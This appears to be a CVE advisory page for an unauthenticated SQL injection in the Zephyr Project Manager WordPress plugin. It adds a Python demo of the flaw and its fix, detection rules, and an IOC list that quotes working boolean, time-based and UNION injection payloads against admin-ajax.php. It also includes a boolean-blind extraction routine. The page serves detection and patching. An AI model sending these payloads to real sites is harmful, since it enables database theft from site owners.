CVE-2022-2840
published 2022-09-19

CVE-2022-2840: The Zephyr Project Manager WordPress plugin before 3.2.5 does not sanitise and escape various parameters before using them in SQL statements via various AJAX…

Priority: P268
Severity: critical (CVSS 3.1 base score 9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 9.68% (94.9th percentile)
The Zephyr Project Manager WordPress plugin before 3.2.5 does not sanitise and escape various parameters before using them in SQL statements via various AJAX actions available to both unauthenticated and authenticated users, leading to SQL injections

Affected

1 range

Vendor: zephyr-one
Product: zephyr_project_manager
Version range: < 3.2.5
Fixed in: 3.2.5
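To make the flaw class in the advisory concrete, here is an added example; it is not code from the plugin, the advisory or the PoC. It models an AJAX handler that interpolates project_id straight into SQL, shows the boolean-blind extraction that the `1 AND <condition>` form in the IOC list enables, and puts a parameterized handler beside it. The schema (zpm_projects, zpm_settings), the api_key value and the function names are constructed for the demo; the backend is SQLite, so the MySQL-only SLEEP() and CONCAT(0x...) payloads from the IOC list are not used.

```python
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the plugin's tables (assumed names, not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE zpm_projects (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("CREATE TABLE zpm_settings (k TEXT, v TEXT)")
    db.execute("INSERT INTO zpm_projects VALUES (1, 'Website redesign')")
    db.execute("INSERT INTO zpm_settings VALUES ('api_key', 'zk_s3cr3t')")
    return db


def view_project_vulnerable(db: sqlite3.Connection, project_id: str):
    """The flaw class from the advisory: request input is neither validated nor
    escaped before being concatenated into the SQL statement."""
    return db.execute(
        f"SELECT id, name FROM zpm_projects WHERE id = {project_id}"
    ).fetchone()


def view_project_fixed(db: sqlite3.Connection, project_id: str):
    """Hardened form: type-check the identifier and bind it as a parameter.
    (In WordPress the equivalent is $wpdb->prepare() with a %d placeholder.)"""
    try:
        pid = int(project_id)
    except ValueError:
        return None
    return db.execute(
        "SELECT id, name FROM zpm_projects WHERE id = ?", (pid,)
    ).fetchone()


def oracle(handler, db: sqlite3.Connection, payload: str) -> bool:
    """True when the injected condition left project 1 visible in the response.
    This is exactly what a `project_id=1 AND 4923=4923` probe tests for."""
    return handler(db, payload) is not None


def extract_via_boolean_blind(handler, db: sqlite3.Connection, max_len: int = 16) -> str:
    """Recover zpm_settings.v for api_key one character at a time using only the
    true/false oracle. Returns '' when the handler is not injectable."""
    charset = string.ascii_lowercase + string.digits + "_"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            cond = (
                "substr((SELECT v FROM zpm_settings WHERE k='api_key'),"
                f"{pos},1)='{ch}'"
            )
            if oracle(handler, db, f"1 AND {cond}"):
                found = ch
                break
        if found is None:  # substr() past the end returns '' and matches nothing
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", extract_via_boolean_blind(view_project_vulnerable, db))
    print("fixed:", repr(extract_via_boolean_blind(view_project_fixed, db)))
```

The point of the oracle is that the attacker never sees query output: the response to `1 AND 4923=4923` looks identical to a normal project view, and the response to a false condition looks like a missing project, which is enough to read arbitrary rows. The fixed handler makes both probes return nothing because the payload is never parsed as SQL.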

Detection & IOCs (extracted from sources)

URL: /wp-admin/admin-ajax.php
Command (boolean-based, project_id): action=zpm_view_project&project_id=1 AND 4923=4923&zpm_nonce=22858bf3a7
Command (time-based, project_id): action=zpm_view_project&project_id=1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=22858bf3a7
Command (UNION-based, project_id): action=zpm_view_project&project_id=-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=22858bf3a7
Command (time-based, task_id): task_id=1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=zpm_view_task&zpm_nonce=22858bf3a7
Command (time-based, task_project): task_project=1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&...&action=zpm_new_task&zpm_nonce=22858bf3a7
Bytes: 0x71707a7071 / 0x71786b6a71 (UNION SQLi delimiter bytes: qpzpq / qxkjq)
  • Monitor POST requests to /wp-admin/admin-ajax.php containing AJAX actions zpm_view_project, zpm_view_task, or zpm_new_task with SQL injection patterns (SLEEP, UNION ALL SELECT, AND/OR boolean clauses) in the project_id, task_id, or task_project parameters.
  • Detect time-based blind SQLi attempts via SLEEP(20) payloads in POST body parameters targeting the Zephyr Project Manager plugin endpoints; a 20-second response delay is a strong indicator.
  • Detect UNION-based SQLi by looking for the hex-encoded delimiter strings 0x71707a7071 (qpzpq) and 0x71786b6a71 (qxkjq) in HTTP POST bodies to admin-ajax.php, which are sqlmap-generated output markers.
  • Flag requests where the Referer header references zephyr_project_manager_projects or zephyr_project_manager_tasks page parameters alongside SQL metacharacters in POST body fields.
  • The vulnerability is exploitable by both unauthenticated and authenticated users via AJAX actions; monitor for SQLi patterns in admin-ajax.php even without a valid WordPress session cookie.
  • The PoC targets plugin version 3.2.42 specifically, while the NVD advisory states that all versions before 3.2.5 are affected; the version numbering discrepancy between the PoC (3.2.42) and the patch boundary (3.2.5) should be verified against the plugin's actual changelog before building version-based checks.
  • The nonce value (zpm_nonce=22858bf3a7) used in the PoC is session-specific and will differ per target; detection rules must not rely on a static nonce value.
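The detection points above, as an added example that is not from the page's sources: a small Python rule set run over constructed request records. The record format, the rule names and the sample bodies are assumptions made for the demo; the bodies are URL-encoded the way an HTTP client would send them (spaces as `+`, `=` as `%3D`), the nonce values are made up, the UNION payload is shortened to fewer NULL columns, and zpm_nonce is deliberately not matched on, as the last bullet advises.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

ZPM_ACTIONS = {"zpm_view_project", "zpm_view_task", "zpm_new_task"}
ZPM_PARAMS = ("project_id", "task_id", "task_project")
ZPM_PAGES = ("zephyr_project_manager_projects", "zephyr_project_manager_tasks")
SQLMAP_MARKERS = ("0x71707a7071", "0x71786b6a71")  # qpzpq / qxkjq from the IOC list

SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+)", re.I)
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
BOOL_RE = re.compile(r"\b(?:AND|OR)\s+\(?\s*(?:\d+\s*=\s*\d+|SELECT\b)", re.I)
METACHAR_RE = re.compile(r"['\"]|--|/\*|;")


def analyse(event: dict) -> list[str]:
    """Return the names of the rules that fire for one request record.
    Record keys (assumed for the demo): method, url, referer, body, duration_s."""
    findings: list[str] = []
    path = urlsplit(event.get("url", "")).path
    if event.get("method") != "POST" or not path.endswith("/wp-admin/admin-ajax.php"):
        return findings
    body = event.get("body", "")
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    decoded = unquote_plus(body)

    if action in ZPM_ACTIONS:
        # Rules 1 and 2: SQLi patterns in the three vulnerable parameters only.
        values = " ".join(v for p in ZPM_PARAMS for v in params.get(p, []))
        if UNION_RE.search(values):
            findings.append("zpm_sqli_union")
        if BOOL_RE.search(values):
            findings.append("zpm_sqli_boolean")
        sleep = SLEEP_RE.search(values)
        if sleep:
            findings.append("zpm_sqli_time_based")
            # A response at least as slow as the requested SLEEP() confirms execution.
            if event.get("duration_s", 0) >= int(sleep.group(1)):
                findings.append("zpm_sqli_time_based_confirmed")
    # Rule 3: sqlmap's UNION delimiter bytes anywhere in a POST to admin-ajax.php.
    if any(marker in decoded.lower() for marker in SQLMAP_MARKERS):
        findings.append("sqlmap_union_markers")
    # Rule 4: Referer on the plugin's admin pages plus SQL metacharacters in the body.
    referer = event.get("referer", "")
    if any(page in referer for page in ZPM_PAGES) and METACHAR_RE.search(decoded):
        findings.append("zpm_referer_with_metachars")
    return findings


def scan(events: list[dict]) -> dict[str, list[str]]:
    return {e["id"]: analyse(e) for e in events}


AJAX = "https://example.test/wp-admin/admin-ajax.php"
PROJECTS_PAGE = "https://example.test/wp-admin/admin.php?page=zephyr_project_manager_projects"
TASKS_PAGE = "https://example.test/wp-admin/admin.php?page=zephyr_project_manager_tasks"

# Constructed request records, not captured traffic.
SAMPLE_EVENTS = [
    {"id": "benign", "method": "POST", "url": AJAX, "referer": PROJECTS_PAGE,
     "body": "action=zpm_view_project&project_id=1&zpm_nonce=a1b2c3d4e5", "duration_s": 0.2},
    {"id": "boolean", "method": "POST", "url": AJAX, "referer": PROJECTS_PAGE,
     "body": "action=zpm_view_project&project_id=1+AND+4923%3D4923&zpm_nonce=f6e5d4c3b2",
     "duration_s": 0.3},
    {"id": "time-based", "method": "POST", "url": AJAX, "referer": "",
     "body": "task_id=1+AND+(SELECT+5365+FROM+(SELECT(SLEEP(20)))AdIX)"
             "&action=zpm_view_task&zpm_nonce=0011223344", "duration_s": 20.4},
    {"id": "union", "method": "POST", "url": AJAX, "referer": TASKS_PAGE,
     "body": "action=zpm_view_project&project_id=-4909+UNION+ALL+SELECT+NULL,NULL,"
             "CONCAT(0x71707a7071,0x41,0x71786b6a71),NULL--+-&zpm_nonce=9988776655",
     "duration_s": 0.4},
    # Same SLEEP() payload against an unrelated action: outside this CVE's scope.
    {"id": "other-plugin", "method": "POST", "url": AJAX, "referer": "",
     "body": "action=heartbeat&data=1+AND+SLEEP(20)", "duration_s": 0.1},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(f"{event_id:13s} {hits or '-'}")
```

Two design choices worth copying into a real rule: the pattern checks are scoped to the three parameters named in the IOCs so that a benign project description containing the word "or" does not page anyone, and the time-based rule compares the measured response time against the SLEEP() argument actually requested rather than a fixed 20 seconds, so an attacker who lowers the delay is still caught.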